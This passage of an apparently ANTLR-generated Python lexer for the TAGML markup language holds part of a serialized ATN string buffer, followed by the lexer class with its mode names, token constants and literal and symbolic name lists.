buf.write("\u0109\3\2\2\2\25\u010d\3\2\2\2\27\u0113\3\2\2\2\31\u0121")
buf.write("\3\2\2\2\33\u0124\3\2\2\2\35\u0128\3\2\2\2\37\u013b\3")
buf.write("\2\2\2!\u0143\3\2\2\2#\u0147\3\2\2\2%\u014d\3\2\2\2\'")
buf.write("\u014f\3\2\2\2)\u0151\3\2\2\2+\u0153\3\2\2\2-\u0155\3")
buf.write("\2\2\2/\u015e\3\2\2\2\61\u0163\3\2\2\2\63\u0167\3\2\2")
buf.write("\2\65\u016b\3\2\2\2\67\u016f\3\2\2\29\u0171\3\2\2\2;\u0175")
buf.write("\3\2\2\2=\u0179\3\2\2\2?\u017e\3\2\2\2A\u0183\3\2\2\2")
buf.write("C\u0188\3\2\2\2E\u019c\3\2\2\2G\u01a1\3\2\2\2I\u01af\3")
buf.write("\2\2\2K\u01b6\3\2\2\2M\u01be\3\2\2\2O\u01c2\3\2\2\2Q\u01c7")
buf.write("\3\2\2\2S\u01cb\3\2\2\2U\u01d0\3\2\2\2W\u01d4\3\2\2\2")
buf.write("Y\u01d8\3\2\2\2[\u01dc\3\2\2\2]\u01e0\3\2\2\2_\u01e6\3")
buf.write("\2\2\2a\u01ea\3\2\2\2c\u01f0\3\2\2\2e\u01f4\3\2\2\2g\u01f8")
buf.write("\3\2\2\2i\u01fa\3\2\2\2k\u01ff\3\2\2\2m\u0206\3\2\2\2")
buf.write("o\u0210\3\2\2\2q\u0217\3\2\2\2s\u0221\3\2\2\2u\u0223\3")
buf.write("\2\2\2w\u0225\3\2\2\2y\u0227\3\2\2\2{\u0229\3\2\2\2}\u0232")
buf.write("\3\2\2\2\177\u0236\3\2\2\2\u0081\u023a\3\2\2\2\u0083\u0240")
buf.write("\3\2\2\2\u0085\u0244\3\2\2\2\u0087\u0248\3\2\2\2\u0089")
buf.write("\u024c\3\2\2\2\u008b\u0250\3\2\2\2\u008d\u0254\3\2\2\2")
buf.write("\u008f\u0262\3\2\2\2\u0091\u0264\3\2\2\2\u0093\u0266\3")
buf.write("\2\2\2\u0095\u0269\3\2\2\2\u0097\u026c\3\2\2\2\u0099\u026e")
buf.write("\3\2\2\2\u009b\u0270\3\2\2\2\u009d\u0272\3\2\2\2\u009f")
buf.write("\u0274\3\2\2\2\u00a1\u0276\3\2\2\2\u00a3\u0278\3\2\2\2")
buf.write("\u00a5\u027a\3\2\2\2\u00a7\u027c\3\2\2\2\u00a9\u027e\3")
buf.write("\2\2\2\u00ab\u0280\3\2\2\2\u00ad\u0282\3\2\2\2\u00af\u0284")
buf.write("\3\2\2\2\u00b1\u028b\3\2\2\2\u00b3\u0290\3\2\2\2\u00b5")
buf.write("\u0295\3\2\2\2\u00b7\u029a\3\2\2\2\u00b9\u029f\3\2\2\2")
buf.write("\u00bb\u02a1\3\2\2\2\u00bd\u02a4\3\2\2\2\u00bf\u02a6\3")
buf.write("\2\2\2\u00c1\u02a8\3\2\2\2\u00c3\u02aa\3\2\2\2\u00c5\u02ac")
buf.write("\3\2\2\2\u00c7\u02ae\3\2\2\2\u00c9\u02b0\3\2\2\2\u00cb")
buf.write("\u02b2\3\2\2\2\u00cd\u02b4\3\2\2\2\u00cf\u02b6\3\2\2\2")
buf.write("\u00d1\u02b8\3\2\2\2\u00d3\u02ba\3\2\2\2\u00d5\u02bc\3")
buf.write("\2\2\2\u00d7\u02be\3\2\2\2\u00d9\u02c0\3\2\2\2\u00db\u02c2")
buf.write("\3\2\2\2\u00dd\u02c4\3\2\2\2\u00df\u02c6\3\2\2\2\u00e1")
buf.write("\u02c8\3\2\2\2\u00e3\u02ca\3\2\2\2\u00e5\u02cc\3\2\2\2")
buf.write("\u00e7\u02ce\3\2\2\2\u00e9\u02d0\3\2\2\2\u00eb\u02d2\3")
buf.write("\2\2\2\u00ed\u02d4\3\2\2\2\u00ef\u02d6\3\2\2\2\u00f1\u02dc")
buf.write("\3\2\2\2\u00f3\u02df\3\2\2\2\u00f5\u02e3\3\2\2\2\u00f7")
buf.write("\u02e6\3\2\2\2\u00f9\u00fa\7]\2\2\u00fa\u00fb\7#\2\2\u00fb")
buf.write("\u00fc\7p\2\2\u00fc\u00fd\7u\2\2\u00fd\u00fe\7\"\2\2\u00fe")
buf.write("\u00ff\3\2\2\2\u00ff\u0100\b\2\2\2\u0100\16\3\2\2\2\u0101")
buf.write("\u0102\5\u008dB\2\u0102\u0103\3\2\2\2\u0103\u0104\b\3")
buf.write("\3\2\u0104\20\3\2\2\2\u0105\u0106\5\u00abQ\2\u0106\u0107")
buf.write("\3\2\2\2\u0107\u0108\b\4\4\2\u0108\22\3\2\2\2\u0109\u010a")
buf.write("\5\u0093E\2\u010a\u010b\3\2\2\2\u010b\u010c\b\5\5\2\u010c")
buf.write("\24\3\2\2\2\u010d\u010e\5\u0091D\2\u010e\u010f\3\2\2\2")
buf.write("\u010f\u0110\b\6\6\2\u0110\26\3\2\2\2\u0111\u0114\n\2")
buf.write("\2\2\u0112\u0114\5\u00b1T\2\u0113\u0111\3\2\2\2\u0113")
buf.write("\u0112\3\2\2\2\u0114\u0115\3\2\2\2\u0115\u0113\3\2\2\2")
buf.write("\u0115\u0116\3\2\2\2\u0116\30\3\2\2\2\u0117\u0122\5\u00f3")
buf.write("u\2\u0118\u011c\5\u00f3u\2\u0119\u011b\5\u00f1t\2\u011a")
buf.write("\u0119\3\2\2\2\u011b\u011e\3\2\2\2\u011c\u011a\3\2\2\2")
buf.write("\u011c\u011d\3\2\2\2\u011d\u011f\3\2\2\2\u011e\u011c\3")
buf.write("\2\2\2\u011f\u0120\5\u00f5v\2\u0120\u0122\3\2\2\2\u0121")
buf.write("\u0117\3\2\2\2\u0121\u0118\3\2\2\2\u0122\32\3\2\2\2\u0123")
buf.write("\u0125\5\u00f1t\2\u0124\u0123\3\2\2\2\u0125\u0126\3\2")
buf.write("\2\2\u0126\u0124\3\2\2\2\u0126\u0127\3\2\2\2\u0127\34")
buf.write("\3\2\2\2\u0128\u0129\5\u00f7w\2\u0129\u012a\3\2\2\2\u012a")
buf.write("\u012b\b\n\3\2\u012b\36\3\2\2\2\u012c\u012d\7j\2\2\u012d")
buf.write("\u012e\7v\2\2\u012e\u012f\7v\2\2\u012f\u0130\7r\2\2\u0130")
buf.write("\u0131\7<\2\2\u0131\u0132\7\61\2\2\u0132\u013c\7\61\2")
buf.write("\2\u0133\u0134\7j\2\2\u0134\u0135\7v\2\2\u0135\u0136\7")
buf.write("v\2\2\u0136\u0137\7r\2\2\u0137\u0138\7u\2\2\u0138\u0139")
buf.write("\7<\2\2\u0139\u013a\7\61\2\2\u013a\u013c\7\61\2\2\u013b")
buf.write("\u012c\3\2\2\2\u013b\u0133\3\2\2\2\u013c\u013f\3\2\2\2")
buf.write("\u013d\u0140\5\u00f1t\2\u013e\u0140\4\60\61\2\u013f\u013d")
buf.write("\3\2\2\2\u013f\u013e\3\2\2\2\u0140\u0141\3\2\2\2\u0141")
buf.write("\u013f\3\2\2\2\u0141\u0142\3\2\2\2\u0142 \3\2\2\2\u0143")
buf.write("\u0144\7_\2\2\u0144\u0145\3\2\2\2\u0145\u0146\b\f\7\2")
buf.write("\u0146\"\3\2\2\2\u0147\u0148\5\u008dB\2\u0148\u0149\3")
buf.write("\2\2\2\u0149\u014a\b\r\3\2\u014a$\3\2\2\2\u014b\u014e")
buf.write("\5\u009bI\2\u014c\u014e\5\u009dJ\2\u014d\u014b\3\2\2\2")
buf.write("\u014d\u014c\3\2\2\2\u014e&\3\2\2\2\u014f\u0150\5\u00a9")
buf.write("P\2\u0150(\3\2\2\2\u0151\u0152\5\u0099H\2\u0152*\3\2\2")
buf.write("\2\u0153\u0154\5\31\b\2\u0154,\3\2\2\2\u0155\u015c\5\u00a1")
buf.write("L\2\u0156\u015d\5\31\b\2\u0157\u0159\5\u00afS\2\u0158")
buf.write("\u0157\3\2\2\2\u0159\u015a\3\2\2\2\u015a\u0158\3\2\2\2")
buf.write("\u015a\u015b\3\2\2\2\u015b\u015d\3\2\2\2\u015c\u0156\3")
buf.write("\2\2\2\u015c\u0158\3\2\2\2\u015d.\3\2\2\2\u015e\u015f")
buf.write("\5\u00f7w\2\u015f\u0160\3\2\2\2\u0160\u0161\b\23\3\2\u0161")
buf.write("\u0162\b\23\b\2\u0162\60\3\2\2\2\u0163\u0164\5\u00adR")
buf.write("\2\u0164\u0165\3\2\2\2\u0165\u0166\b\24\7\2\u0166\62\3")
buf.write("\2\2\2\u0167\u0168\5\u008fC\2\u0168\u0169\3\2\2\2\u0169")
buf.write("\u016a\b\25\7\2\u016a\64\3\2\2\2\u016b\u016c\7<\2\2\u016c")
buf.write("\u016d\7k\2\2\u016d\u016e\7f\2\2\u016e\66\3\2\2\2\u016f")
buf.write("\u0170\5\31\b\2\u01708\3\2\2\2\u0171\u0172\5\u00f7w\2")
buf.write("\u0172\u0173\3\2\2\2\u0173\u0174\b\30\3\2\u0174:\3\2\2")
buf.write("\2\u0175\u0176\7?\2\2\u0176\u0177\3\2\2\2\u0177\u0178")
buf.write("\b\31\t\2\u0178<\3\2\2\2\u0179\u017a\7/\2\2\u017a\u017b")
buf.write("\7@\2\2\u017b\u017c\3\2\2\2\u017c\u017d\b\32\n\2\u017d")
buf.write(">\3\2\2\2\u017e\u017f\5\u008fC\2\u017f\u0180\3\2\2\2\u0180")
buf.write("\u0181\b\33\7\2\u0181\u0182\b\33\7\2\u0182@\3\2\2\2\u0183")
buf.write("\u0184\5\u00adR\2\u0184\u0185\3\2\2\2\u0185\u0186\b\34")
buf.write("\7\2\u0186\u0187\b\34\7\2\u0187B\3\2\2\2\u0188\u0189\5")
buf.write("\u00f7w\2\u0189\u018a\3\2\2\2\u018a\u018b\b\35\3\2\u018b")
buf.write("D\3\2\2\2\u018c\u018f\7$\2\2\u018d\u0190\n\3\2\2\u018e")
buf.write("\u0190\5\u00b9X\2\u018f\u018d\3\2\2\2\u018f\u018e\3\2")
buf.write("\2\2\u0190\u0191\3\2\2\2\u0191\u018f\3\2\2\2\u0191\u0192")
buf.write("\3\2\2\2\u0192\u0193\3\2\2\2\u0193\u019d\7$\2\2\u0194")
buf.write("\u0197\7)\2\2\u0195\u0198\n\4\2\2\u0196\u0198\5\u00b7")
buf.write("W\2\u0197\u0195\3\2\2\2\u0197\u0196\3\2\2\2\u0198\u0199")
buf.write("\3\2\2\2\u0199\u0197\3\2\2\2\u0199\u019a\3\2\2\2\u019a")
buf.write("\u019b\3\2\2\2\u019b\u019d\7)\2\2\u019c\u018c\3\2\2\2")
buf.write("\u019c\u0194\3\2\2\2\u019d\u019e\3\2\2\2\u019e\u019f\b")
buf.write("\36\7\2\u019fF\3\2\2\2\u01a0\u01a2\5\u00afS\2\u01a1\u01a0")
buf.write("\3\2\2\2\u01a2\u01a3\3\2\2\2\u01a3\u01a1\3\2\2\2\u01a3")
buf.write("\u01a4\3\2\2\2\u01a4\u01ab\3\2\2\2\u01a5\u01a7\7\60\2")
buf.write("\2\u01a6\u01a8\5\u00afS\2\u01a7\u01a6\3\2\2\2\u01a8\u01a9")
buf.write("\3\2\2\2\u01a9\u01a7\3\2\2\2\u01a9\u01aa\3\2\2\2\u01aa")
buf.write("\u01ac\3\2\2\2\u01ab\u01a5\3\2\2\2\u01ab\u01ac\3\2\2\2")
buf.write("\u01ac\u01ad\3\2\2\2\u01ad\u01ae\b\37\7\2\u01aeH\3\2\2")
buf.write("\2\u01af\u01b0\5\u00e3m\2\u01b0\u01b1\5\u00dfk\2\u01b1")
buf.write("\u01b2\5\u00e5n\2\u01b2\u01b3\5\u00c5^\2\u01b3\u01b4\3")
buf.write("\2\2\2\u01b4\u01b5\b \7\2\u01b5J\3\2\2\2\u01b6\u01b7\5")
buf.write("\u00c7_\2\u01b7\u01b8\5\u00bdZ\2\u01b8\u01b9\5\u00d3e")
buf.write("\2\u01b9\u01ba\5\u00e1l\2\u01ba\u01bb\5\u00c5^\2\u01bb")
buf.write("\u01bc\3\2\2\2\u01bc\u01bd\b!\7\2\u01bdL\3\2\2\2\u01be")
buf.write("\u01bf\5\31\b\2\u01bf\u01c0\3\2\2\2\u01c0\u01c1\b\"\7")
buf.write("\2\u01c1N\3\2\2\2\u01c2\u01c3\7]\2\2\u01c3\u01c4\7@\2")
buf.write("\2\u01c4\u01c5\3\2\2\2\u01c5\u01c6\b#\13\2\u01c6P\3\2")
buf.write("\2\2\u01c7\u01c8\7}\2\2\u01c8\u01c9\3\2\2\2\u01c9\u01ca")
buf.write("\b$\f\2\u01caR\3\2\2\2\u01cb\u01cc\5\u00abQ\2\u01cc\u01cd")
buf.write("\3\2\2\2\u01cd\u01ce\b%\r\2\u01ce\u01cf\b%\t\2\u01cfT")
buf.write("\3\2\2\2\u01d0\u01d1\5\31\b\2\u01d1\u01d2\3\2\2\2\u01d2")
buf.write("\u01d3\b&\7\2\u01d3V\3\2\2\2\u01d4\u01d5\5\u008dB\2\u01d5")
buf.write("\u01d6\3\2\2\2\u01d6\u01d7\b\'\3\2\u01d7X\3\2\2\2\u01d8")
buf.write("\u01d9\5\u00abQ\2\u01d9\u01da\3\2\2\2\u01da\u01db\b(\4")
buf.write("\2\u01dbZ\3\2\2\2\u01dc\u01dd\5\u0093E\2\u01dd\u01de\3")
buf.write("\2\2\2\u01de\u01df\b)\5\2\u01df\\\3\2\2\2\u01e0\u01e1")
buf.write("\5\u0091D\2\u01e1\u01e2\3\2\2\2\u01e2\u01e3\b*\6\2\u01e3")
buf.write("^\3\2\2\2\u01e4\u01e7\n\2\2\2\u01e5\u01e7\5\u00b1T\2\u01e6")
buf.write("\u01e4\3\2\2\2\u01e6\u01e5\3\2\2\2\u01e7\u01e8\3\2\2\2")
buf.write("\u01e8\u01e6\3\2\2\2\u01e8\u01e9\3\2\2\2\u01e9`\3\2\2")
buf.write("\2\u01ea\u01eb\7>\2\2\u01eb\u01ec\7_\2\2\u01ec\u01ed\3")
buf.write("\2\2\2\u01ed\u01ee\b,\7\2\u01ee\u01ef\b,\7\2\u01efb\3")
buf.write("\2\2\2\u01f0\u01f1\5\u00f7w\2\u01f1\u01f2\3\2\2\2\u01f2")
buf.write("\u01f3\b-\3\2\u01f3d\3\2\2\2\u01f4\u01f5\7<\2\2\u01f5")
buf.write("\u01f6\7k\2\2\u01f6\u01f7\7f\2\2\u01f7f\3\2\2\2\u01f8")
buf.write("\u01f9\5\31\b\2\u01f9h\3\2\2\2\u01fa\u01fb\7/\2\2\u01fb")
buf.write("\u01fc\7@\2\2\u01fc\u01fd\3\2\2\2\u01fd\u01fe\b\60\n\2")
buf.write("\u01fej\3\2\2\2\u01ff\u0200\7?\2\2\u0200\u0201\3\2\2\2")
buf.write("\u0201\u0202\b\61\t\2\u0202l\3\2\2\2\u0203\u0205\5\u00f7")
buf.write("w\2\u0204\u0203\3\2\2\2\u0205\u0208\3\2\2\2\u0206\u0204")
buf.write("\3\2\2\2\u0206\u0207\3\2\2\2\u0207\u0209\3\2\2\2\u0208")
buf.write("\u0206\3\2\2\2\u0209\u020a\7\177\2\2\u020a\u020b\3\2\2")
buf.write("\2\u020b\u020c\b\62\7\2\u020c\u020d\b\62\7\2\u020dn\3")
buf.write("\2\2\2\u020e\u0211\5\u00f7w\2\u020f\u0211\5\u00a9P\2\u0210")
buf.write("\u020e\3\2\2\2\u0210\u020f\3\2\2\2\u0211\u0212\3\2\2\2")
buf.write("\u0212\u0213\b\63\t\2\u0213p\3\2\2\2\u0214\u0216\5\u00f7")
buf.write("w\2\u0215\u0214\3\2\2\2\u0216\u0219\3\2\2\2\u0217\u0215")
buf.write("\3\2\2\2\u0217\u0218\3\2\2\2\u0218\u021a\3\2\2\2\u0219")
buf.write("\u0217\3\2\2\2\u021a\u021b\5\u00adR\2\u021b\u021c\3\2")
buf.write("\2\2\u021c\u021d\b\64\7\2\u021d\u021e\b\64\7\2\u021er")
buf.write("\3\2\2\2\u021f\u0222\5\u009bI\2\u0220\u0222\5\u009fK\2")
buf.write("\u0221\u021f\3\2\2\2\u0221\u0220\3\2\2\2\u0222t\3\2\2")
buf.write("\2\u0223\u0224\5\31\b\2\u0224v\3\2\2\2\u0225\u0226\5\u0099")
buf.write("H\2\u0226x\3\2\2\2\u0227\u0228\5\u00a9P\2\u0228z\3\2\2")
buf.write("\2\u0229\u0230\5\u00a1L\2\u022a\u0231\5\31\b\2\u022b\u022d")
buf.write("\5\u00afS\2\u022c\u022b\3\2\2\2\u022d\u022e\3\2\2\2\u022e")
buf.write("\u022c\3\2\2\2\u022e\u022f\3\2\2\2\u022f\u0231\3\2\2\2")
buf.write("\u0230\u022a\3\2\2\2\u0230\u022c\3\2\2\2\u0231|\3\2\2")
buf.write("\2\u0232\u0233\5\u00f7w\2\u0233\u0234\3\2\2\2\u0234\u0235")
buf.write("\b:\3\2\u0235~\3\2\2\2\u0236\u0237\5\u00adR\2\u0237\u0238")
buf.write("\3\2\2\2\u0238\u0239\b;\7\2\u0239\u0080\3\2\2\2\u023a")
buf.write("\u023b\5\u008dB\2\u023b\u023c\3\2\2\2\u023c\u023d\b<\3")
buf.write("\2\u023d\u0082\3\2\2\2\u023e\u0241\n\5\2\2\u023f\u0241")
buf.write("\5\u00b3U\2\u0240\u023e\3\2\2\2\u0240\u023f\3\2\2\2\u0241")
buf.write("\u0242\3\2\2\2\u0242\u0240\3\2\2\2\u0242\u0243\3\2\2\2")
buf.write("\u0243\u0084\3\2\2\2\u0244\u0245\5\u00abQ\2\u0245\u0246")
buf.write("\3\2\2\2\u0246\u0247\b>\4\2\u0247\u0086\3\2\2\2\u0248")
buf.write("\u0249\5\u0093E\2\u0249\u024a\3\2\2\2\u024a\u024b\b?\5")
buf.write("\2\u024b\u0088\3\2\2\2\u024c\u024d\5\u0091D\2\u024d\u024e")
buf.write("\3\2\2\2\u024e\u024f\b@\6\2\u024f\u008a\3\2\2\2\u0250")
buf.write("\u0251\5\u0095F\2\u0251\u0252\3\2\2\2\u0252\u0253\bA\7")
buf.write("\2\u0253\u008c\3\2\2\2\u0254\u0255\7]\2\2\u0255\u0256")
buf.write("\7#\2\2\u0256\u0257\7\"\2\2\u0257\u025b\3\2\2\2\u0258")
buf.write("\u025a\13\2\2\2\u0259\u0258\3\2\2\2\u025a\u025d\3\2\2")
buf.write("\2\u025b\u025c\3\2\2\2\u025b\u0259\3\2\2\2\u025c\u025e")
buf.write("\3\2\2\2\u025d\u025b\3\2\2\2\u025e\u025f\7\"\2\2\u025f")
buf.write("\u0260\7#\2\2\u0260\u0261\7_\2\2\u0261\u008e\3\2\2\2\u0262")
buf.write("\u0263\7@\2\2\u0263\u0090\3\2\2\2\u0264\u0265\7>\2\2\u0265")
buf.write("\u0092\3\2\2\2\u0266\u0267\7>\2\2\u0267\u0268\7~\2\2\u0268")
buf.write("\u0094\3\2\2\2\u0269\u026a\7~\2\2\u026a\u026b\7@\2\2\u026b")
buf.write("\u0096\3\2\2\2\u026c\u026d\5\u0099H\2\u026d\u0098\3\2")
buf.write("\2\2\u026e\u026f\7~\2\2\u026f\u009a\3\2\2\2\u0270\u0271")
buf.write("\7A\2\2\u0271\u009c\3\2\2\2\u0272\u0273\7-\2\2\u0273\u009e")
buf.write("\3\2\2\2\u0274\u0275\7/\2\2\u0275\u00a0\3\2\2\2\u0276")
buf.write("\u0277\7\u0080\2\2\u0277\u00a2\3\2\2\2\u0278\u0279\5\u00ab")
buf.write("Q\2\u0279\u00a4\3\2\2\2\u027a\u027b\5\u00adR\2\u027b\u00a6")
buf.write("\3\2\2\2\u027c\u027d\7\60\2\2\u027d\u00a8\3\2\2\2\u027e")
buf.write("\u027f\7.\2\2\u027f\u00aa\3\2\2\2\u0280\u0281\7]\2\2\u0281")
buf.write("\u00ac\3\2\2\2\u0282\u0283\7_\2\2\u0283\u00ae\3\2\2\2")
buf.write("\u0284\u0285\t\6\2\2\u0285\u00b0\3\2\2\2\u0286\u0287\7")
buf.write("^\2\2\u0287\u028c\7>\2\2\u0288\u0289\7^\2\2\u0289\u028c")
buf.write("\7]\2\2\u028a\u028c\5\u00bbY\2\u028b\u0286\3\2\2\2\u028b")
buf.write("\u0288\3\2\2\2\u028b\u028a\3\2\2\2\u028c\u00b2\3\2\2\2")
buf.write("\u028d\u0291\5\u00b1T\2\u028e\u028f\7^\2\2\u028f\u0291")
buf.write("\7~\2\2\u0290\u028d\3\2\2\2\u0290\u028e\3\2\2\2\u0291")
buf.write("\u00b4\3\2\2\2\u0292\u0296\5\u00bbY\2\u0293\u0294\7^\2")
buf.write("\2\u0294\u0296\7#\2\2\u0295\u0292\3\2\2\2\u0295\u0293")
buf.write("\3\2\2\2\u0296\u00b6\3\2\2\2\u0297\u029b\5\u00bbY\2\u0298")
buf.write("\u0299\7^\2\2\u0299\u029b\7)\2\2\u029a\u0297\3\2\2\2\u029a")
buf.write("\u0298\3\2\2\2\u029b\u00b8\3\2\2\2\u029c\u02a0\5\u00bb")
buf.write("Y\2\u029d\u029e\7^\2\2\u029e\u02a0\7$\2\2\u029f\u029c")
buf.write("\3\2\2\2\u029f\u029d\3\2\2\2\u02a0\u00ba\3\2\2\2\u02a1")
buf.write("\u02a2\7^\2\2\u02a2\u02a3\7^\2\2\u02a3\u00bc\3\2\2\2\u02a4")
buf.write("\u02a5\t\7\2\2\u02a5\u00be\3\2\2\2\u02a6\u02a7\t\b\2\2")
buf.write("\u02a7\u00c0\3\2\2\2\u02a8\u02a9\t\t\2\2\u02a9\u00c2\3")
buf.write("\2\2\2\u02aa\u02ab\t\n\2\2\u02ab\u00c4\3\2\2\2\u02ac\u02ad")
buf.write("\t\13\2\2\u02ad\u00c6\3\2\2\2\u02ae\u02af\t\f\2\2\u02af")
buf.write("\u00c8\3\2\2\2\u02b0\u02b1\t\r\2\2\u02b1\u00ca\3\2\2\2")
buf.write("\u02b2\u02b3\t\16\2\2\u02b3\u00cc\3\2\2\2\u02b4\u02b5")
buf.write("\t\17\2\2\u02b5\u00ce\3\2\2\2\u02b6\u02b7\t\20\2\2\u02b7")
buf.write("\u00d0\3\2\2\2\u02b8\u02b9\t\21\2\2\u02b9\u00d2\3\2\2")
buf.write("\2\u02ba\u02bb\t\22\2\2\u02bb\u00d4\3\2\2\2\u02bc\u02bd")
buf.write("\t\23\2\2\u02bd\u00d6\3\2\2\2\u02be\u02bf\t\24\2\2\u02bf")
buf.write("\u00d8\3\2\2\2\u02c0\u02c1\t\25\2\2\u02c1\u00da\3\2\2")
buf.write("\2\u02c2\u02c3\t\26\2\2\u02c3\u00dc\3\2\2\2\u02c4\u02c5")
buf.write("\t\27\2\2\u02c5\u00de\3\2\2\2\u02c6\u02c7\t\30\2\2\u02c7")
buf.write("\u00e0\3\2\2\2\u02c8\u02c9\t\31\2\2\u02c9\u00e2\3\2\2")
buf.write("\2\u02ca\u02cb\t\32\2\2\u02cb\u00e4\3\2\2\2\u02cc\u02cd")
buf.write("\t\33\2\2\u02cd\u00e6\3\2\2\2\u02ce\u02cf\t\34\2\2\u02cf")
buf.write("\u00e8\3\2\2\2\u02d0\u02d1\t\35\2\2\u02d1\u00ea\3\2\2")
buf.write("\2\u02d2\u02d3\t\36\2\2\u02d3\u00ec\3\2\2\2\u02d4\u02d5")
buf.write("\t\37\2\2\u02d5\u00ee\3\2\2\2\u02d6\u02d7\t \2\2\u02d7")
buf.write("\u00f0\3\2\2\2\u02d8\u02dd\5\u00f3u\2\u02d9\u02dd\t!\2")
buf.write("\2\u02da\u02dd\5\u00afS\2\u02db\u02dd\t\"\2\2\u02dc\u02d8")
buf.write("\3\2\2\2\u02dc\u02d9\3\2\2\2\u02dc\u02da\3\2\2\2\u02dc")
buf.write("\u02db\3\2\2\2\u02dd\u00f2\3\2\2\2\u02de\u02e0\t#\2\2")
buf.write("\u02df\u02de\3\2\2\2\u02e0\u00f4\3\2\2\2\u02e1\u02e4\5")
buf.write("\u00f3u\2\u02e2\u02e4\5\u00afS\2\u02e3\u02e1\3\2\2\2\u02e3")
buf.write("\u02e2\3\2\2\2\u02e4\u00f6\3\2\2\2\u02e5\u02e7\t$\2\2")
buf.write("\u02e6\u02e5\3\2\2\2\u02e7\u02e8\3\2\2\2\u02e8\u02e6\3")
buf.write("\2\2\2\u02e8\u02e9\3\2\2\2\u02e9\u00f8\3\2\2\2\64\2\3")
buf.write("\4\5\6\7\b\t\n\13\f\u0113\u0115\u011c\u0121\u0126\u013b")
buf.write("\u013f\u0141\u014d\u015a\u015c\u018f\u0191\u0197\u0199")
buf.write("\u019c\u01a3\u01a9\u01ab\u01e6\u01e8\u0206\u0210\u0217")
buf.write("\u0221\u022e\u0230\u0240\u0242\u025b\u028b\u0290\u0295")
buf.write("\u029a\u029f\u02dc\u02df\u02e3\u02e8\16\7\3\2\b\2\2\7")
buf.write("\4\2\7\f\2\7\13\2\6\2\2\7\5\2\7\6\2\7\7\2\7\b\2\7\t\2")
buf.write("\7\n\2")
return buf.getvalue()
class TAGMLLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
INSIDE_NAMESPACE = 1
INSIDE_MARKUP_OPENER = 2
ANNOTATIONS = 3
ANNOTATION_VALUE = 4
INSIDE_REF_VALUE = 5
INSIDE_RICH_TEXT = 6
INSIDE_OBJECT = 7
INSIDE_LIST = 8
INSIDE_MARKUP_CLOSER = 9
INSIDE_TEXT_VARIATION = 10
DEFAULT_NamespaceOpener = 1
DEFAULT_Comment = 2
DEFAULT_BeginOpenMarkup = 3
DEFAULT_BeginTextVariation = 4
DEFAULT_BeginCloseMarkup = 5
DEFAULT_Text = 6
NAME = 7
IN_NamespaceIdentifier = 8
IN_WS = 9
IN_NamespaceURI = 10
IN_NamespaceCloser = 11
IMO_Comment = 12
IMO_Prefix = 13
IMO_Comma = 14
IMO_Divider = 15
IMO_Name = 16
IMO_Suffix = 17
IMO_WS = 18
IMO_EndMilestoneMarkup = 19
IMO_EndOpenMarkup = 20
A_IdAnnotation = 21
A_AnnotationName = 22
A_WS = 23
A_EQ = 24
A_Ref = 25
A_EndOpenMarkup = 26
A_EndMilestoneMarkup = 27
AV_WS = 28
AV_StringValue = 29
AV_NumberValue = 30
AV_TRUE = 31
AV_FALSE = 32
AV_IdValue = 33
AV_RichTextOpener = 34
AV_ObjectOpener = 35
AV_ListOpener = 36
RV_RefValue = 37
IRT_Comment = 38
IRT_BeginOpenMarkup = 39
IRT_BeginTextVariation = 40
IRT_BeginCloseMarkup = 41
IRT_Text = 42
IRT_RichTextCloser = 43
IO_WS = 44
IO_IdAnnotation = 45
IO_AnnotationName = 46
IO_Ref = 47
IO_EQ = 48
IO_ObjectCloser = 49
IL_SEPARATOR = 50
IL_ListCloser = 51
IMC_Prefix = 52
IMC_Name = 53
IMC_Divider = 54
IMC_Comma = 55
IMC_Suffix = 56
IMC_WS = 57
IMC_EndCloseMarkup = 58
ITV_Comment = 59
ITV_Text = 60
ITV_BeginOpenMarkup = 61
ITV_BeginTextVariation = 62
ITV_BeginCloseMarkup = 63
ITV_EndTextVariation = 64
Comment = 65
TagOpenEndChar = 66
TagCloseStartChar = 67
TextVariationStartTag = 68
TextVariationEndTag = 69
TextVariationSeparator = 70
PIPE = 71
Optional = 72
Resume = 73
Suspend = 74
TILDE = 75
LIST_OPENER = 76
LIST_CLOSER = 77
DOT = 78
COMMA = 79
LEFT_SQUARE_BRACKET = 80
RIGHT_SQUARE_BRACKET = 81
DIGIT = 82
REGULAR_TEXT_ESCAPE_CHARACTER = 83
TEXT_VARIATION_ESCAPE_CHARACTER = 84
COMMENT_ESCAPE_CHARACTER = 85
SINGLE_QUOTED_TEXT_ESCAPE_CHARACTER = 86
DOUBLE_QUOTED_TEXT_ESCAPE_CHARACTER = 87
NameEndChar = 88
WS = 89
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ "DEFAULT_MODE", "INSIDE_NAMESPACE", "INSIDE_MARKUP_OPENER",
"ANNOTATIONS", "ANNOTATION_VALUE", "INSIDE_REF_VALUE",
"INSIDE_RICH_TEXT", "INSIDE_OBJECT", "INSIDE_LIST", "INSIDE_MARKUP_CLOSER",
"INSIDE_TEXT_VARIATION" ]
literalNames = [ "<INVALID>",
"'[!ns '", "'[>'", "'{'", "'<]'", "'>'", "'<'", "'<|'", "'|>'",
"'|'", "'?'", "'+'", "'-'", "'~'", "'.'", "','", "'['" ]
symbolicNames = [ "<INVALID>",
"DEFAULT_NamespaceOpener", "DEFAULT_Comment", "DEFAULT_BeginOpenMarkup",
"DEFAULT_BeginTextVariation", "DEFAULT_BeginCloseMarkup", "DEFAULT_Text",
"NAME", "IN_NamespaceIdentifier", "IN_WS", "IN_NamespaceURI",
"IN_NamespaceCloser", "IMO_Comment", "IMO_Prefix", "IMO_Comma",
"IMO_Divider", "IMO_Name", "IMO_Suffix", "IMO_WS", "IMO_EndMilestoneMarkup",
"IMO_EndOpenMarkup", "A_IdAnnotation", "A_AnnotationName", "A_WS",
"A_EQ", "A_Ref", "A_EndOpenMarkup", "A_EndMilestoneMarkup",
"AV_WS", "AV_StringValue", "AV_NumberValue", "AV_TRUE", "AV_FALSE",
"AV_IdValue", "AV_RichTextOpener", "AV_ObjectOpener", "AV_ListOpener",
"RV_RefValue", "IRT_Comment", "IRT_BeginOpenMarkup", "IRT_BeginTextVariation",
"IRT_BeginCloseMarkup", "IRT_Text", "IRT_RichTextCloser", "IO_WS",
"IO_IdAnnotation", "IO_AnnotationName", "IO_Ref", "IO_EQ", "IO_ObjectCloser",
"IL_SEPARATOR", "IL_ListCloser", "IMC_Prefix", "IMC_Name", "IMC_Divider",
